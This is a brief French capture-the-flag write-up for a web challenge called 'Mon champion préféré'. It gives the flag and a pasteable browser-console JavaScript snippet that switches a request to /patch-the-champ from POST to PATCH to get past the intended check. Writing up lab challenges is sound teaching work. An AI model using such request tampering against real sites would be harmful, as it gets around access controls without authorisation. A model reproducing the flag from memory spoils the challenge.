Mon champion préféré
Flag: CYBN{J3_P4TCH_C0MM3_UN_D13U}
Challenge
Ce challenge tourne sur un docker et n'est pas disponible
Solution
En cliquant sur le bouton Patch, le site fait une requête POST
sur /patch-the-champ
.

Il faut remplacer la méthode POST
par PATCH
, pour ça on peut copier-coller le code Javscript dans la console du navigateur :

var xhr = new XMLHttpRequest();
// On change juste ici
xhr.open('PATCH', '/patch-the-champ', true);
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.onload = function() {
if (xhr.status === 200) {
alert('Le champion a été patché !');
} else {
alert('Error: ' + xhr.statusText);
}
};
var data = JSON.stringify({ "patch": true });
xhr.send(data);

Dernière mise à jour
Cet article vous a-t-il été utile ?